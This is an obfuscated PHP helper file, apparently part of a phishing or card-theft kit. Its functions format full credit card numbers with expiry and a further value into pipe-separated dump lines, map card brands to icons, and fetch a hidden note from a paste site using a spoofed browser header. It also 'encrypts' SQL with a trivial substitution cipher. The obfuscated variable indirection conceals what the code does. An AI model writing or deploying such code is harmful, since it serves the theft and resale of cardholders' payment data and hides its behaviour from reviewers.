<?php
${"GLOBALS"}["oixjll"]="palavras_cad2";
${"GLOBALS"}["pevxnaqkwv"]="var1";
${"GLOBALS"}["srazgignum"]="store";
${"GLOBALS"}["qjyqrc"]="context";
${"GLOBALS"}["cfigedbomhu"]="url";
${"GLOBALS"}["agvmimgnd"]="cod";
${"GLOBALS"}["seyebwgmmz"]="min_cc2";
${"GLOBALS"}["evyxfvmnis"]="min_cc1";
${"GLOBALS"}["lkpybyny"]="remove2";
${"GLOBALS"}["pehthrpjhyy"]="remove1";
${"GLOBALS"}["kmwrtwyh"]="contar";
${"GLOBALS"}["ndpzdpw"]="novo_nome";
${"GLOBALS"}["mbcvnhbdesw"]="valor_a";
${"GLOBALS"}["xiijdbszypfj"]="nome_novo_a";
${"GLOBALS"}["hxqcjdtv"]="valor_b";
${"GLOBALS"}["qqilqs"]="retorno";
${"GLOBALS"}["ltbqmcsbgi"]="hora";
${"GLOBALS"}["mpiyxveozd"]="segundos";
${"GLOBALS"}["bwrjufgntlj"]="marcador";
${"GLOBALS"}["zvqkrvndtcrh"]="diferenca";
${"GLOBALS"}["jfrzcgxg"]="dias";
${"GLOBALS"}["keaipdh"]="dia_hora_atual";
${"GLOBALS"}["fzijrrysc"]="data_index";
date_default_timezone_set("America/Sao_Paulo");
${${"GLOBALS"}["fzijrrysc"]}=date("d/m/Y");
$GLOBALS["cod"]="dge3b746";
function tempo_restante($data){$lgyiqrnngtfj="dia_hora_evento";
$vaplcdj="dia_hora_evento";
${"GLOBALS"}["gpmwjd"]="diferenca";
$hiaannqqrfso="minuto";
$xxixgylwtw="data";
${${"GLOBALS"}["keaipdh"]}=strtotime(date("Y-m-d H:i:s"));
${$vaplcdj}=strtotime(date(${$xxixgylwtw}));
${"GLOBALS"}["devpreb"]="marcador";
${"GLOBALS"}["xgebyaxuv"]="marcador";
$qkaoww="tempo_restante";
${${"GLOBALS"}["gpmwjd"]}=${$lgyiqrnngtfj}-${${"GLOBALS"}["keaipdh"]};
${${"GLOBALS"}["jfrzcgxg"]}=intval(${${"GLOBALS"}["zvqkrvndtcrh"]}/86400);
$qwtwtrx="marcador";
$lkhvdxmdyoiv="hora";
${${"GLOBALS"}["bwrjufgntlj"]}=${${"GLOBALS"}["zvqkrvndtcrh"]}%86400;
${$lkhvdxmdyoiv}=intval(${${"GLOBALS"}["xgebyaxuv"]}/3600);
$kxamygmukp="marcador";
${${"GLOBALS"}["bwrjufgntlj"]}=${${"GLOBALS"}["devpreb"]}%3600;
${"GLOBALS"}["xthhooq"]="minuto";
${"GLOBALS"}["duntojuc"]="retorno";
${$hiaannqqrfso}=intval(${$kxamygmukp}/60);
${${"GLOBALS"}["mpiyxveozd"]}=${$qwtwtrx}%60;
if(${${"GLOBALS"}["jfrzcgxg"]}<=0&${${"GLOBALS"}["ltbqmcsbgi"]}<=0&${${"GLOBALS"}["xthhooq"]}<=0){${${"GLOBALS"}["qqilqs"]}=2;
$bxkdbpuxfwx="tempo_restante";
${$bxkdbpuxfwx}="$dias dias $hora horas $minuto minutos e $segundos segundos";
}else{${"GLOBALS"}["bnmjjspdrki"]="tempo_restante";
${${"GLOBALS"}["qqilqs"]}=1;
${${"GLOBALS"}["bnmjjspdrki"]}="$dias dias $hora horas $minuto minutos e $segundos segundos";
}return array(${${"GLOBALS"}["duntojuc"]},${$qkaoww});
}function filtrar_nome($valor_a,$valor_b){$sycxofj="contar";
$wwsnlmhpy="contar";
${"GLOBALS"}["ejntkcq"]="novo_nome";
$glcnfqmvx="valor_a";
${$sycxofj}=strlen(${$glcnfqmvx});
if(${$wwsnlmhpy}>${${"GLOBALS"}["hxqcjdtv"]}){${${"GLOBALS"}["xiijdbszypfj"]}=substr(${${"GLOBALS"}["mbcvnhbdesw"]},0,${${"GLOBALS"}["hxqcjdtv"]});
${${"GLOBALS"}["ndpzdpw"]}="$nome_novo_a...";
}else if(${${"GLOBALS"}["kmwrtwyh"]}<${${"GLOBALS"}["hxqcjdtv"]} and(${${"GLOBALS"}["kmwrtwyh"]}>0)){${${"GLOBALS"}["ndpzdpw"]}=${${"GLOBALS"}["mbcvnhbdesw"]};
}else{$pxfwjalrmh="novo_nome";
${$pxfwjalrmh}="Vazio";
}return${${"GLOBALS"}["ejntkcq"]};
}function filtrar_cc($valor_a,$valor_b,$valor_c,$valor_d){${"GLOBALS"}["ffbvsaocvlv"]="valor_d";
$ozudsb="valor_b";
${${"GLOBALS"}["pehthrpjhyy"]}=str_replace(" ","",${${"GLOBALS"}["mbcvnhbdesw"]});
${${"GLOBALS"}["lkpybyny"]}=str_replace("/","|",${$ozudsb});
$qpxvvilt="junta";
if(${${"GLOBALS"}["ffbvsaocvlv"]}==1){${"GLOBALS"}["qmwmun"]="junta";
$wezsowtx="remove1";
${${"GLOBALS"}["evyxfvmnis"]}=substr(${${"GLOBALS"}["pehthrpjhyy"]},0,4);
${${"GLOBALS"}["seyebwgmmz"]}=substr(${$wezsowtx},12,18);
${${"GLOBALS"}["qmwmun"]}="$min_cc1********$min_cc2";
}else{${"GLOBALS"}["mrfkkbneao"]="junta";
${${"GLOBALS"}["mrfkkbneao"]}="$remove1|$remove2|$valor_c";
}return${$qpxvvilt};
}function filtrar_bandeira($string){$owvvzsvy="string";
${"GLOBALS"}["ilaptneogj"]="tr";
${${"GLOBALS"}["ilaptneogj"]}=strtr(${$owvvzsvy},array("visa"=>"visa.png","mastercard"=>"mastercard.png","discover"=>"discover.png","visa"=>"visa.png","elo"=>"elo.png","hipercard"=>"hipercard.png","american express company"=>"amex.png","ebt"=>"maestro.png","maestro"=>"maestro.png","jcb"=>"jcb.png"));
$vhzsdrq="tr";
return${$vhzsdrq};
}function get_host(){$owtrhe="var2";
$ldcdovqum="options";
${"GLOBALS"}["ukcyjuuhj"]="var2";
${${"GLOBALS"}["agvmimgnd"]}=$GLOBALS["cod"];
$cmqyaned="var1";
${"GLOBALS"}["gorwzydfp"]="store";
${${"GLOBALS"}["cfigedbomhu"]}="https://anotepad.com/notes/$cod";
$otfddq="options";
${$otfddq}=array("http"=>array("method"=>"GET","header"=>"Accept-language: en\r\n"."Cookie: foo=bar\r\n"."User-Agent: Mozilla/5.0 (Macintosh;Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"));
${${"GLOBALS"}["qjyqrc"]}=stream_context_create(${$ldcdovqum});
${${"GLOBALS"}["srazgignum"]}=file_get_contents(${${"GLOBALS"}["cfigedbomhu"]},false,${${"GLOBALS"}["qjyqrc"]});
${$cmqyaned}=explode(".?",${${"GLOBALS"}["gorwzydfp"]});
${${"GLOBALS"}["ukcyjuuhj"]}=explode("?.",${${"GLOBALS"}["pevxnaqkwv"]}[1]);
return "".$_SERVER['SERVER_NAME']."/zk/apimg";
}function crip_pass($sql){$eirpcpvd="palavras_cad2";
${"GLOBALS"}["ujtjpqnnn"]="sql";
$xgmbzpxghrh="nova_string2";
$qkxbsqc="replace2";
$lmqibyghdok="nova_string2";
${"GLOBALS"}["jghohepas"]="replace2";
${$eirpcpvd}=array("a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","x","z","y","w"," ");
${$qkxbsqc}=array("#4/","-5%","0_=","=5/","+4]","\$1\$","3?)","\$9*","}1%","@2\$","^6#","<@7","*8^","%~3","{,4","\$51","@7]","%6}","0?_","0:;
",":2/","=,1","+7.","@3<","!3>","%4´","&8|");
${$xgmbzpxghrh}=str_replace(${${"GLOBALS"}["oixjll"]},${${"GLOBALS"}["jghohepas"]},${${"GLOBALS"}["ujtjpqnnn"]});
return${$lmqibyghdok};
}
?>